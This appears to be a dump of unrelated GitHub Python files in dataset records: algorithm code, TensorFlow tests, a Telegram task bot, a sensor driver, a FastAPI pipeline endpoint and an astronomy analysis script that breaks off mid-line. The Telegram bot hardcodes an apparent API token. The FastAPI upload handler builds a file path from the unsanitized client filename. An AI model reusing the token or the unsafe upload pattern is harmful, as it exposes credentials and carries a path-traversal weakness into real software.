def findRightInterval(self, intervals):\n '''\n :type intervals: List[List[int]]\n :rtype: List[int]\n '''\n result = [-1] * len(intervals)\n max_start_heap, max_end_heap = [], []\n for i in range(len(intervals)):\n heappush(max_start_heap, (-intervals[i][0], i))\n heappush(max_end_heap, (-intervals[i][1], i))\n\n # go through all the intervals to find each interval's next interval\n for _ in range(len(intervals)):\n top_end, i = heappop(max_end_heap)\n if max_start_heap and -max_start_heap[0][0] >= -top_end:\n curr_start, curr_start_i = heappop(max_start_heap)\n # keep finding the interval that has the closest start\n while max_start_heap and -max_start_heap[0][0] >= -top_end:\n curr_start, curr_start_i = heappop(max_start_heap)\n result[i] = curr_start_i\n # put the interval back as it could be the next interval of other intervals\n heappush(max_start_heap, (curr_start, curr_start_i))\n return result\n","repo_name":"Shirleyxxy/lc-python-algorithms","sub_path":"medium/find-right-interval.py","file_name":"find-right-interval.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"1904555908","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nfrom scipy import linalg\nimport tensorflow as tf\n\ndistributions = tf.contrib.distributions\n\n\ndef make_pd(start, n):\n \"\"\"Deterministically create a positive definite matrix.\"\"\"\n x = np.tril(linalg.circulant(np.arange(start, start + n)))\n return np.dot(x, x.T)\n\n\ndef chol(x):\n \"\"\"Compute Cholesky factorization.\"\"\"\n return linalg.cholesky(x).T\n\n\ndef wishart_var(df, x):\n \"\"\"Compute Wishart variance for numpy scale matrix.\"\"\"\n x = np.sqrt(df) * np.asarray(x)\n d = np.expand_dims(np.diag(x), -1)\n return x**2 + np.dot(d, d.T)\n\n\nclass WishartCholeskyTest(tf.test.TestCase):\n\n def testEntropy(self):\n with self.test_session():\n scale = make_pd(1., 2)\n df = 4\n w = distributions.WishartCholesky(df, chol(scale))\n # sp.stats.wishart(df=4, scale=make_pd(1., 2)).entropy()\n self.assertAllClose(6.301387092430769, w.entropy().eval())\n\n w = distributions.WishartCholesky(df=1, scale=[[1.]])\n # sp.stats.wishart(df=1,scale=1).entropy()\n self.assertAllClose(0.78375711047393404, w.entropy().eval())\n\n def testMeanLogDetAndLogNormalizingConstant(self):\n with self.test_session():\n def entropy_alt(w):\n return (w.log_normalizing_constant() -\n 0.5 * (w.df - w.dimension - 1.) * w.mean_log_det() +\n 0.5 * w.df * w.dimension).eval()\n\n w = distributions.WishartCholesky(df=4, scale=chol(make_pd(1., 2)))\n self.assertAllClose(w.entropy().eval(), entropy_alt(w))\n\n w = distributions.WishartCholesky(df=5, scale=[[1.]])\n self.assertAllClose(w.entropy().eval(), entropy_alt(w))\n\n def testMean(self):\n with self.test_session():\n scale = make_pd(1., 2)\n df = 4\n w = distributions.WishartCholesky(df, chol(scale))\n self.assertAllEqual(df * scale, w.mean().eval())\n\n def testMode(self):\n with self.test_session():\n scale = make_pd(1., 2)\n df = 4\n w = distributions.WishartCholesky(df, chol(scale))\n self.assertAllEqual((df - 2. - 1.) * scale, w.mode().eval())\n\n def testStd(self):\n with self.test_session():\n scale = make_pd(1., 2)\n df = 4\n w = distributions.WishartCholesky(df, chol(scale))\n self.assertAllEqual(chol(wishart_var(df, scale)), w.std().eval())\n\n def testVariance(self):\n with self.test_session():\n scale = make_pd(1., 2)\n df = 4\n w = distributions.WishartCholesky(df, chol(scale))\n self.assertAllEqual(wishart_var(df, scale), w.variance().eval())\n\n def testSample(self):\n with self.test_session():\n scale = make_pd(1., 2)\n df = 4\n\n chol_w = distributions.WishartCholesky(\n df, chol(scale), cholesky_input_output_matrices=False)\n\n x = chol_w.sample_n(1, seed=42).eval()\n chol_x = [chol(x[0])]\n\n full_w = distributions.WishartFull(\n df, scale, cholesky_input_output_matrices=False)\n self.assertAllClose(x, full_w.sample_n(1, seed=42).eval())\n\n chol_w_chol = distributions.WishartCholesky(\n df, chol(scale), cholesky_input_output_matrices=True)\n self.assertAllClose(chol_x, chol_w_chol.sample_n(1, seed=42).eval())\n eigen_values = tf.matrix_diag_part(chol_w_chol.sample_n(1000, seed=42))\n np.testing.assert_array_less(0., eigen_values.eval())\n\n full_w_chol = distributions.WishartFull(\n df, scale, cholesky_input_output_matrices=True)\n self.assertAllClose(chol_x, full_w_chol.sample_n(1, seed=42).eval())\n eigen_values = tf.matrix_diag_part(full_w_chol.sample_n(1000, seed=42))\n np.testing.assert_array_less(0., eigen_values.eval())\n\n # Check first and second moments.\n df = 4.\n chol_w = distributions.WishartCholesky(\n df=df,\n scale=chol(make_pd(1., 3)),\n cholesky_input_output_matrices=False)\n x = chol_w.sample_n(10000, seed=42)\n self.assertAllEqual((10000, 3, 3), x.get_shape())\n\n moment1_estimate = tf.reduce_mean(x, reduction_indices=[0]).eval()\n self.assertAllClose(chol_w.mean().eval(),\n moment1_estimate,\n rtol=0.05)\n\n # The Variance estimate uses the squares rather than outer-products\n # because Wishart.Variance is the diagonal of the Wishart covariance\n # matrix.\n variance_estimate = (\n tf.reduce_mean(tf.square(x), reduction_indices=[0]) -\n tf.square(moment1_estimate)).eval()\n self.assertAllClose(chol_w.variance().eval(),\n variance_estimate,\n rtol=0.05)\n\n def testProb(self):\n with self.test_session():\n # Generate some positive definite (pd) matrices and their Cholesky\n # factorizations.\n x = np.array([\n make_pd(1., 2),\n make_pd(2., 2),\n make_pd(3., 2),\n make_pd(4., 2)])\n chol_x = np.array([\n chol(x[0]),\n chol(x[1]),\n chol(x[2]),\n chol(x[3])])\n\n # Since Wishart wasn\"t added to SciPy until 0.16, we'll spot check some\n # pdfs with hard-coded results from upstream SciPy.\n\n log_prob_df_seq = np.array([\n # math.log(stats.wishart.pdf(x[0], df=2+0, scale=x[0]))\n -3.5310242469692907,\n # math.log(stats.wishart.pdf(x[1], df=2+1, scale=x[1]))\n -7.689907330328961,\n # math.log(stats.wishart.pdf(x[2], df=2+2, scale=x[2]))\n -10.815845159537895,\n # math.log(stats.wishart.pdf(x[3], df=2+3, scale=x[3]))\n -13.640549882916691,\n ])\n\n # This test checks that batches don't interfere with correctness.\n w = distributions.WishartCholesky(\n df=[2, 3, 4, 5],\n scale=chol_x,\n cholesky_input_output_matrices=True)\n self.assertAllClose(log_prob_df_seq, w.log_pdf(chol_x).eval())\n\n # Now we test various constructions of Wishart with different sample\n # shape.\n\n log_prob = np.array([\n # math.log(stats.wishart.pdf(x[0], df=4, scale=x[0]))\n -4.224171427529236,\n # math.log(stats.wishart.pdf(x[1], df=4, scale=x[0]))\n -6.3378770664093453,\n # math.log(stats.wishart.pdf(x[2], df=4, scale=x[0]))\n -12.026946850193017,\n # math.log(stats.wishart.pdf(x[3], df=4, scale=x[0]))\n -20.951582705289454,\n ])\n\n for w in (\n distributions.WishartCholesky(\n df=4, scale=chol_x[0], cholesky_input_output_matrices=False),\n distributions.WishartFull(\n df=4, scale=x[0], cholesky_input_output_matrices=False)):\n self.assertAllEqual((2, 2), w.event_shape().eval())\n self.assertEqual(2, w.dimension.eval())\n self.assertAllClose(log_prob[0], w.log_prob(x[0]).eval())\n self.assertAllClose(log_prob[0:2], w.log_prob(x[0:2]).eval())\n self.assertAllClose(\n np.reshape(log_prob, (2, 2)),\n w.log_prob(np.reshape(x, (2, 2, 2, 2))).eval())\n self.assertAllClose(\n np.reshape(np.exp(log_prob), (2, 2)),\n w.prob(np.reshape(x, (2, 2, 2, 2))).eval())\n self.assertAllEqual(\n (2, 2),\n w.log_prob(np.reshape(x, (2, 2, 2, 2))).get_shape())\n\n for w in (\n distributions.WishartCholesky(\n df=4, scale=chol_x[0], cholesky_input_output_matrices=True),\n distributions.WishartFull(\n df=4, scale=x[0], cholesky_input_output_matrices=True)):\n self.assertAllEqual((2, 2), w.event_shape().eval())\n self.assertEqual(2, w.dimension.eval())\n self.assertAllClose(log_prob[0], w.log_prob(chol_x[0]).eval())\n self.assertAllClose(log_prob[0:2], w.log_prob(chol_x[0:2]).eval())\n self.assertAllClose(\n np.reshape(log_prob, (2, 2)),\n w.log_prob(np.reshape(chol_x, (2, 2, 2, 2))).eval())\n self.assertAllClose(\n np.reshape(np.exp(log_prob), (2, 2)),\n w.prob(np.reshape(chol_x, (2, 2, 2, 2))).eval())\n self.assertAllEqual(\n (2, 2),\n w.log_prob(np.reshape(x, (2, 2, 2, 2))).get_shape())\n\n def testBatchShape(self):\n with self.test_session() as sess:\n scale = make_pd(1., 2)\n chol_scale = chol(scale)\n\n w = distributions.WishartCholesky(df=4, scale=chol_scale)\n self.assertAllEqual([], w.get_batch_shape())\n self.assertAllEqual([], w.batch_shape().eval())\n\n w = distributions.WishartCholesky(\n df=[4., 4], scale=np.array([chol_scale, chol_scale]))\n self.assertAllEqual([2], w.get_batch_shape())\n self.assertAllEqual([2], w.batch_shape().eval())\n\n scale_deferred = tf.placeholder(tf.float32)\n w = distributions.WishartCholesky(df=4, scale=scale_deferred)\n self.assertAllEqual(\n [], sess.run(w.batch_shape(), feed_dict={scale_deferred: chol_scale}))\n self.assertAllEqual(\n [2], sess.run(w.batch_shape(),\n feed_dict={scale_deferred: [chol_scale, chol_scale]}))\n\n def testEventShape(self):\n with self.test_session() as sess:\n scale = make_pd(1., 2)\n chol_scale = chol(scale)\n\n w = distributions.WishartCholesky(df=4, scale=chol_scale)\n self.assertAllEqual([2, 2], w.get_event_shape())\n self.assertAllEqual([2, 2], w.event_shape().eval())\n\n w = distributions.WishartCholesky(\n df=[4., 4], scale=np.array([chol_scale, chol_scale]))\n self.assertAllEqual([2, 2], w.get_event_shape())\n self.assertAllEqual([2, 2], w.event_shape().eval())\n\n scale_deferred = tf.placeholder(tf.float32)\n w = distributions.WishartCholesky(df=4, scale=scale_deferred)\n self.assertAllEqual(\n [2, 2], sess.run(w.event_shape(),\n feed_dict={scale_deferred: chol_scale}))\n self.assertAllEqual(\n [2, 2],\n sess.run(w.event_shape(),\n feed_dict={scale_deferred: [chol_scale, chol_scale]}))\n\n def testValidateArgs(self):\n with self.test_session() as sess:\n df_deferred = tf.placeholder(tf.float32)\n chol_scale_deferred = tf.placeholder(tf.float32)\n x = make_pd(1., 3)\n chol_scale = chol(x)\n\n # Check expensive, deferred assertions.\n with self.assertRaisesRegexp(tf.errors.InvalidArgumentError,\n \"cannot be less than\"):\n chol_w = distributions.WishartCholesky(df=df_deferred,\n scale=chol_scale_deferred,\n validate_args=True)\n sess.run(chol_w.log_prob(np.asarray(x, dtype=np.float32)),\n feed_dict={df_deferred: 2., chol_scale_deferred: chol_scale})\n\n with self.assertRaisesRegexp(tf.errors.InvalidArgumentError,\n \"LLT decomposition was not successful\"):\n chol_w = distributions.WishartFull(df=df_deferred,\n scale=chol_scale_deferred)\n # np.ones((3, 3)) is not positive, definite.\n sess.run(chol_w.log_prob(np.asarray(x, dtype=np.float32)),\n feed_dict={\n df_deferred: 4.,\n chol_scale_deferred: np.ones((3, 3), dtype=np.float32)})\n\n # Ensure no assertions.\n chol_w = distributions.WishartCholesky(df=df_deferred,\n scale=chol_scale_deferred,\n validate_args=False)\n sess.run(chol_w.log_prob(np.asarray(x, dtype=np.float32)),\n feed_dict={df_deferred: 4, chol_scale_deferred: chol_scale})\n # Bogus log_prob, but since we have no checks running... c\"est la vie.\n sess.run(chol_w.log_prob(np.asarray(x, dtype=np.float32)),\n feed_dict={df_deferred: 4, chol_scale_deferred: np.ones((3, 3))})\n\n # Still has these assertions because they're resolveable at graph\n # construction\n with self.assertRaisesRegexp(ValueError, \"cannot be less than\"):\n chol_w = distributions.WishartCholesky(\n df=2, scale=chol_scale,\n validate_args=False)\n with self.assertRaisesRegexp(TypeError, \"not a floating-point type\"):\n chol_w = distributions.WishartCholesky(\n df=4., scale=np.asarray(chol_scale, dtype=np.int32),\n validate_args=False)\n\n\nif __name__ == \"__main__\":\n tf.test.main()\n","repo_name":"hughperkins/tf-coriander","sub_path":"tensorflow/contrib/distributions/python/kernel_tests/wishart_test.py","file_name":"wishart_test.py","file_ext":"py","file_size_in_byte":12372,"program_lang":"python","lang":"en","doc_type":"code","stars":789,"dataset":"github-code","pt":"43"} +{"seq_id":"9172064436","text":"import sqlite3\nfrom django.core.management.base import BaseCommand\nimport telebot\nfrom tasks.models import Task\n\n\nbot = telebot.TeleBot(\"6320700758:AAFxoLeyKsL8e-wE1-yHrZ-pMqbXYJ0VJNI\")\n\n\n\n\n@bot.message_handler(commands=['start'])\ndef start(message):\n bot.send_message(message.chat.id, \"Hello world!\")\n\n\n@bot.message_handler(commands=['tasks'])\ndef tasks(message):\n tasks = Task.objects.all()\n for task in tasks:\n bot.send_message(message.chat.id, \"Name: \" + task.name + \" Importance: \" + str(task.importance))\n\n@bot.message_handler(commands=['help'])\ndef help(message):\n bot.send_message(message.chat.id, \"Список комманд:\\n/start - Начать\\n/tasks - Список дел\\n/help - Список комманд\")\n\n@bot.message_handler(commands=['add'])\ndef add(message):\n # Получаем аргументы команды\n text = message.text[len('/add '):].strip()\n args = text.split()\n\n # Проверяем, что передано достаточно аргументов\n if len(args) != 2:\n bot.send_message(message.chat.id, 'Вот шаблон, как пользоваться функцией /add:\\n /add <имя> <важность(от 1 до 4)>')\n return\n\n task_name = args[0]\n try:\n importance = int(args[1])\n except ValueError:\n bot.send_message(message.chat.id, 'Ошибка: importance должно быть числом от 1 до 4')\n return\n\n # Проверяем валидность значения importance\n if importance < 1 or importance > 4:\n bot.send_message(message.chat.id, 'Ошибка: importance должно быть числом от 1 до 4')\n return\n\n new_task = Task.objects.create(name=task_name, importance=importance)\n\n bot.send_message(message.chat.id, f'Задача \"{task_name}\" добавлена с важностью {importance}')\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n print(\"Starting bot...\")\n bot.polling()\n print(\"Bot stopped\")\n\n\n@bot.message_handler(func=lambda message: True)\ndef echo_all(message):\n bot.reply_to(message, message.text)","repo_name":"TimurShagiev/TaskBot","sub_path":"pythonProject2/TaskProject/tasks/management/commands/run_telegram_bot.py","file_name":"run_telegram_bot.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"33212659029","text":"import sys\nsys.path.append(\"../..\")\nfrom machine import I2C,Pin\nimport lib.am2320\n\nclass AM2320:\n def __init__(self, i2cNum=0, scl=17, sda=16, freq=100000):\n self.i2c = I2C(i2cNum,scl=Pin(scl),sda=Pin(sda),freq=freq)\n self.sensor = lib.am2320.AM2320(self.i2c)\n \n # 回傳感測器讀取資料,未讀到回傳 None\n def getMeasureData(self):\n data = {}\n if self.sensor.measure() != False:\n temp = self.sensor.temperature()\n hum = self.sensor.humidity()\n data['temp'] = float(f\"{temp:.1f}\")\n data['hum'] = float(f\"{hum:.1f}\")\n return data\n return None\n","repo_name":"cmsg-iot/nttu-ta-develop","sub_path":"Raspberry-Pi-Pico/projects/gas-detected-system/micropython/model/modules/AM2320.py","file_name":"AM2320.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"36689067084","text":"import tensorflow as tf\nimport os\n\n# 声明两个变量并计算它们的和。\nv1 = tf.Variable(tf.constant(1.0, shape=[1]), name=\"v1\")\nv2 = tf.Variable(tf.constant(2.0, shape=[1]), name=\"v2\")\nresult = v1+v2\n\ninit_op = tf.global_variables_initializer()\n# 声明tf.train.Saver类用于保存模型\nsaver = tf.train.Saver()\n\n\nwith tf.Session() as sess:\n sess.run(init_op)\n # 将模型保存到/model/model.ckpt文件。\n saver.save(sess,os.path.dirname(os.getcwd()) + \"\\\\model\\\\model.ckpt\")","repo_name":"jijiwawa/graduation-project-","sub_path":"learn_tensorflow/test5.4.1.py","file_name":"test5.4.1.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"9972785887","text":"from fastapi import FastAPI, File, UploadFile\nfrom yaml import safe_dump, safe_load\nfrom core.utils import checkdir\nfrom core.pipeline import Pipeline\nfrom pandas import DataFrame\nfrom os import environ\n\napp = FastAPI()\n\n\n@app.post('/run')\nasync def run(db_url: str, file: UploadFile = File(...)):\n folder = 'config'\n environ['DB_URL'] = db_url\n checkdir(folder)\n with open(f'{folder}/{file.filename}', 'w') as f:\n safe_dump(safe_load(await file.read()), f)\n p = Pipeline(f'{folder}/{file.filename}')\n df = p.run()\n if isinstance(df, DataFrame):\n df.fillna(0, inplace=True)\n df = df.to_dict(\"records\")\n return {\"message\": df}\n","repo_name":"shrinivdeshmukh/synapse-sparks","sub_path":"api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"35172474641","text":"import sys, os\nfrom random import random\nimport numpy as np\nimport astropy.units as u\nfrom astropy.coordinates import SkyCoord, match_coordinates_sky\nfrom astropy.cosmology import WMAP9\nfrom astropy.stats import bootstrap\nfrom astropy.table import Table\nfrom mpi4py import MPI\n\n\ndef check_edge(ra_rand, dec_rand):\n\n cat_random_cut = cat_random_copy[abs(cat_random_copy['RA'] - ra_rand) < 0.7 / dis / np.pi * 180]\n cat_random_cut = cat_random_cut[abs(cat_random_cut['DEC'] - dec_rand) < 0.7 / dis / np.pi * 180]\n\n try:\n ra_ratio = len(cat_random_cut[cat_random_cut['RA']ra_rand])\n dec_ratio = len(cat_random_cut[cat_random_cut['DEC']dec_rand])\n except (ValueError, ZeroDivisionError):\n return True\n\n if ra_ratio > 1/0.75 or ra_ratio < 0.75:\n return True\n elif dec_ratio > 1/0.75 or dec_ratio < 0.75:\n return True\n else:\n return False\n\n\ndef bkg(cat_neighbors_z_slice_rand, coord_massive_gal_rand, mass_cen):\n\n cat_neighbors_z_slice_rand = cat_neighbors_z_slice_rand[cat_neighbors_z_slice_rand['MASS_MED'] > masscut_low]\n cat_neighbors_z_slice_rand = cat_neighbors_z_slice_rand[cat_neighbors_z_slice_rand['MASS_MED'] < masscut_high]\n\n global z\n counts_gals_rand = np.zeros(bin_number)\n n = 0\n num_before_success = 0\n flag_bkg = 0\n\n coord_rand_list = []\n while n < 1: # get several blank pointing's to estimate background\n id_rand = int(random() * len(cat_random))\n ra_rand = cat_random[id_rand]['RA']\n dec_rand = cat_random[id_rand]['DEC']\n idx, sep2d, dist3d = match_coordinates_sky(SkyCoord(ra_rand, dec_rand, unit=\"deg\"), coord_massive_gal_rand, nthneighbor=1)\n\n num_before_success += 1\n if num_before_success > 20:\n flag_bkg = 1\n break\n\n if sep2d.degree > r_iso*2/dis/np.pi*180: # make sure the random pointing is away from any central galaxy (blank)\n if check_edge(ra_rand, dec_rand):\n continue\n\n coord_rand = SkyCoord(ra_rand * u.deg, dec_rand * u.deg)\n coord_rand_list.append(coord_rand)\n cat_neighbors_rand = cat_neighbors_z_slice_rand[abs(cat_neighbors_z_slice_rand['RA'] - ra_rand) < r_iso/dis/np.pi*180]\n cat_neighbors_rand = cat_neighbors_rand[abs(cat_neighbors_rand['DEC'] - dec_rand) < r_iso/dis/np.pi*180]\n coord_neighbors_rand = SkyCoord(cat_neighbors_rand['RA'] * u.deg, cat_neighbors_rand['DEC'] * u.deg)\n\n # exclude bkg apertures that contains galaxies more massive than central\n if len(cat_neighbors_rand) != 0:\n if max(cat_neighbors_rand['MASS_MED']) > mass_cen:\n continue\n elif len(cat_neighbors_rand) < 100:\n continue\n\n # choose radial range\n cat_neighbors_rand = cat_neighbors_rand[np.logical_and(coord_neighbors_rand.separation(coord_rand).degree < r_high/dis/np.pi*180,\n coord_neighbors_rand.separation(coord_rand).degree > r_low / dis / np.pi*180)]\n\n mass_neighbors_rand = cat_neighbors_rand['MASS_MED']\n if len(mass_neighbors_rand) != 0:\n if ssfq == 'all':\n sfq_weights_rand = np.ones(len(mass_neighbors_rand))\n elif ssfq == 'ssf':\n sfq_weights_rand = cat_neighbors_rand['sfProb_nuvrk']\n else:\n sfq_weights_rand = 1 - cat_neighbors_rand['sfProb_nuvrk']\n\n weights = np.array(sfq_weights_rand / completeness_est(mass_neighbors_rand, cat_neighbors_rand['sfProb_nuvrk'], z))\n if not rel_scale:\n counts_gals_rand = np.histogram(mass_neighbors_rand, weights=weights, bins=bin_edges)[0]\n else:\n rel_mass_neighbors_rand = mass_neighbors_rand - mass_cen\n counts_gals_rand = np.histogram(rel_mass_neighbors_rand, weights=weights, bins=rel_bin_edges)[0]\n\n else:\n counts_gals_rand += np.zeros(bin_number)\n\n n = n + 1\n\n return coord_rand_list, counts_gals_rand, flag_bkg\n\n\ndef bkg_2(cat_neighbors_z_slice_rand, coord_massive_gal_rand, mass_cen):\n counts_gals_rand = np.zeros(bin_number)\n flag_bkg2 = 0\n\n cat_neighbors_rand = cat_neighbors_z_slice_rand[abs(cat_neighbors_z_slice_rand['RA'] - coord_massive_gal_rand.ra) < 1 / dis / np.pi * 180]\n cat_neighbors_rand = cat_neighbors_rand[abs(cat_neighbors_rand['DEC'] - coord_massive_gal_rand.dec) < 1 / dis / np.pi * 180]\n coord_neighbors_rand = SkyCoord(cat_neighbors_rand['RA'] * u.deg, cat_neighbors_rand['DEC'] * u.deg)\n\n # exclude bkg apertures that contains galaxies more massive than central\n # if len(cat_neighbors_rand) != 0:\n # if max(cat_neighbors_rand['MASS_MED']) > mass_cen:\n # return 0,0,0\n\n # choose radial range\n cat_neighbors_rand = cat_neighbors_rand[\n np.logical_and(coord_neighbors_rand.separation(coord_massive_gal_rand).degree < (r_high + 0.1) / dis / np.pi * 180,\n coord_neighbors_rand.separation(coord_massive_gal_rand).degree > r_high / dis / np.pi * 180)]\n\n # make some cuts\n cat_neighbors_rand = cat_neighbors_rand[cat_neighbors_rand['MASS_MED'] > masscut_low]\n cat_neighbors_rand = cat_neighbors_rand[cat_neighbors_rand['MASS_MED'] < masscut_high]\n\n mass_neighbors_rand = cat_neighbors_rand['MASS_MED']\n if len(mass_neighbors_rand) != 0:\n if ssfq == 'all':\n sfq_weights_rand = np.ones(len(mass_neighbors_rand))\n elif ssfq == 'ssf':\n sfq_weights_rand = cat_neighbors_rand['sfProb_nuvrk']\n else:\n sfq_weights_rand = 1 - cat_neighbors_rand['sfProb_nuvrk']\n\n weights = np.array(sfq_weights_rand / completeness_est(mass_neighbors_rand, cat_neighbors_rand['sfProb_nuvrk'], z))\n if not rel_scale:\n counts_gals_rand = np.histogram(mass_neighbors_rand, weights=weights, bins=bin_edges)[0]\n else:\n rel_mass_neighbors_rand = mass_neighbors_rand - mass_cen\n counts_gals_rand = np.histogram(rel_mass_neighbors_rand, weights=weights, bins=rel_bin_edges)[0]\n\n else:\n counts_gals_rand += np.zeros(bin_number)\n\n return counts_gals_rand, flag_bkg2\n\n\ndef correct_for_masked_area(ra, dec):\n # correct area for normalization if it is partially in masked region\n if not correct_masked:\n return np.ones(bin_number), np.ones(bin_number)\n else:\n cat_nomask = cat_random_nomask[abs(cat_random_nomask['RA'] - ra) < r_iso / dis / np.pi * 180]\n cat_nomask = cat_nomask[abs(cat_nomask['DEC'] - dec) < r_iso / dis / np.pi * 180]\n cat_nomask = cat_nomask[SkyCoord(cat_nomask['RA'] * u.deg, cat_nomask['DEC'] * u.deg).separation\n (SkyCoord(ra * u.deg, dec * u.deg)).degree < r_iso / dis / np.pi * 180]\n\n cat_mask = cat_random[abs(cat_random['RA'] - ra) < r_iso / dis / np.pi * 180]\n cat_mask = cat_mask[abs(cat_mask['DEC'] - dec) < r_iso / dis / np.pi * 180]\n cat_mask = cat_mask[SkyCoord(cat_mask['RA'] * u.deg, cat_mask['DEC'] * u.deg).separation\n (SkyCoord(ra * u.deg, dec * u.deg)).degree < r_iso / dis / np.pi * 180]\n\n if len(cat_nomask) == 0:\n return np.zeros(bin_number), np.zeros(bin_number)\n else:\n coord = SkyCoord(ra * u.deg, dec * u.deg)\n coord_nomask = SkyCoord(cat_nomask['RA'] * u.deg, cat_nomask['DEC'] * u.deg)\n radius_list_nomask = coord_nomask.separation(coord).degree / 180. * np.pi * dis * 1000\n count_nomask = np.histogram(radius_list_nomask, bins=bin_edges)[0]\n count_nomask = np.array(count_nomask).astype(float)\n if len(cat_mask) == 0:\n count_mask = np.zeros(bin_number)\n else:\n coord_mask = SkyCoord(cat_mask['RA'] * u.deg, cat_mask['DEC'] * u.deg)\n radius_list_mask = coord_mask.separation(coord).degree / 180. * np.pi * dis * 1000\n count_mask = np.histogram(radius_list_mask, bins=bin_edges)[0]\n count_mask = np.array(count_mask).astype(float)\n\n return count_mask, count_nomask\n\n\ndef cut_random_cat(cat_rand, coord_list):\n # cut random point catalog to avoid overlapping\n add_to_random_points(coord_list)\n for coord in coord_list:\n coord_rand_list = SkyCoord(cat_rand['RA'] * u.deg, cat_rand['DEC'] * u.deg)\n cat_rand = cat_rand[coord_rand_list.separation(coord).degree > r_iso * 2 / dis / np.pi * 180]\n return cat_rand\n\n\ndef add_to_random_points(coord_list):\n # store coord of selected random points just for record\n for coord in coord_list:\n cat_random_points.add_row([coord.ra.value, coord.dec.value, gal['NUMBER']])\n\n return 0\n\n\ndef completeness_est(mass_list, sfProb_list, z):\n try:\n completeness_sf = np.genfromtxt('../mass_completeness_data/allFields_' + str(round(z - 0.1, 1)) + '_z_' + str(round(z + 0.1,1)) + '_sf_nopert_nan.txt')\n completeness_q = np.genfromtxt('../mass_completeness_data/allFields_' + str(round(z - 0.1, 1)) + '_z_' + str(round(z + 0.1,1)) + '_q_nopert_nan.txt')\n completeness = np.array([])\n for idx in range(len(mass_list)):\n if sfProb_list[idx] > 0.5:\n completeness = np.append(completeness, np.interp(mass_list[idx], completeness_sf[0], completeness_sf[3]))\n else:\n completeness = np.append(completeness, np.interp(mass_list[idx], completeness_q[0], completeness_q[3]))\n\n completeness[np.isnan(completeness)] = 1.\n return completeness\n except:\n return np.ones(len(mass_list))\n\n\ndef scatter():\n # randomize redshift and mass for bootstrapping\n z_scatter = np.random.normal(cat_gal[zkeyname], 0.044 * (cat_gal[zkeyname] + 1)) # photoz scatter\n #mass_scatter = np.log10(abs(np.random.normal(10 ** (cat_gal['MASS_MED'] - 10),\n # (cat_gal['MASS_SUP'] - cat_gal['MASS_INF'])/2 * 10 ** (cat_gal['MASS_MED'] - 10)))) + 10 # mass scatter\n\n #cat_gal['MASS_MED'] = mass_scatter\n cat_gal[zkeyname] = z_scatter\n\n# multi-threading settings\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nnProcs = comm.Get_size()\n# ################# START #####################\nall_z = False\ncorrect_masked = True\nsave_results = True\nsave_catalogs = False\nrel_scale = False\nmasscut_low = 7.0\nmasscut_high = 13.0\nmasscut_host = 11.15\nr_iso = 0.7 # Mpc (isolation criteria radius)\nr_high = 0.7 # Mpc\nr_low = 0.0 # Mpc\nsat_z_cut = 4.5\ncsfq = 'all' # csf, cq, all\nssfq = sys.argv[1]\nboot_num = 2\nzkeyname = 'ZPHOT'\n\n# main loop\nz = eval(sys.argv[2])\nz_bin_size = 0.1\nbin_number = 20\nbin_edges = np.linspace(masscut_low , masscut_high, num=bin_number+1)\nrel_bin_edges = np.linspace(-4, 0, num=bin_number+1)\n\ncatalog_path = '/home/lejay/catalogs/'\npath = '/home/lejay/test_smf/test_smf_new_cat/'\nif path[-1] != '/' and save_results:\n raise NameError('path is not a directory!')\nelif save_results:\n print('will save results to ' + path)\n if not os.path.exists(path):\n os.system('mkdir '+path)\nelse:\n print('will NOT save results!')\n\n# distribute data and collect results\nif rank == 0:\n print('radius range:', r_low, r_high, 'sat_z_cut:', sat_z_cut)\n print('csfq =', csfq, 'ssfq =', ssfq, masscut_low, masscut_high)\n\n # set job distribution\n cat_names = ['COSMOS_deep', 'ELAIS_deep', 'XMM-LSS_deep', 'DEEP_deep']\n if nProcs == len(cat_names)+1:\n for Proc in range(1, nProcs):\n comm.send(cat_names[Proc-1], dest=Proc)\n\n # stand-by to collect results\n smf_dist_tot = np.zeros(bin_number)\n smf_dist_bkg_tot = np.zeros(bin_number)\n smf_dist_sat_tot = np.zeros(bin_number)\n smf_dist_inf_tot = np.zeros(bin_number)\n smf_dist_bkg_inf_tot = np.zeros(bin_number)\n smf_dist_sat_inf_tot = np.zeros(bin_number)\n smf_dist_sup_tot = np.zeros(bin_number)\n smf_dist_bkg_sup_tot = np.zeros(bin_number)\n smf_dist_sat_sup_tot = np.zeros(bin_number)\n mass_cens_tot = []\n isolated_counts_tot = 0\n bkg_counts_tot = 0\n for i in range(1, nProcs):\n smf_dist, smf_dist_bkg, smf_dist_sat, mass_cens, isolated_counts, bkg_counts = comm.recv(source=MPI.ANY_SOURCE)\n\n smf_dist_tot += smf_dist[0]\n smf_dist_bkg_tot += smf_dist_bkg[0]\n smf_dist_sat_tot += smf_dist_sat[0]\n\n smf_dist_inf_tot += smf_dist[1]\n smf_dist_bkg_inf_tot += smf_dist_bkg[1]\n smf_dist_sat_inf_tot += smf_dist_sat[1]\n\n smf_dist_sup_tot += smf_dist[2]\n smf_dist_bkg_sup_tot += smf_dist_bkg[2]\n smf_dist_sat_sup_tot += smf_dist_sat[2]\n\n mass_cens_tot += mass_cens # addition of two lists (append)\n isolated_counts_tot += isolated_counts\n bkg_counts_tot += bkg_counts\n\n # output result to file\n print(round(sum(smf_dist_tot)), round(sum(smf_dist_bkg_tot)), round(sum(smf_dist_sat_tot)))\n smf_dist_cen_tot = np.histogram(mass_cens_tot, bins=bin_edges)[0]\n if len(mass_cens_tot) == isolated_counts_tot and save_results:\n filename = path + 'smf_' + str(r_low) + '_'+str(r_high) + '_' + str(masscut_low) + '_' + str(csfq) + '_' + str(ssfq) + '_' + str(round(z, 1))\n print(filename)\n\n np.save(filename + '_total', 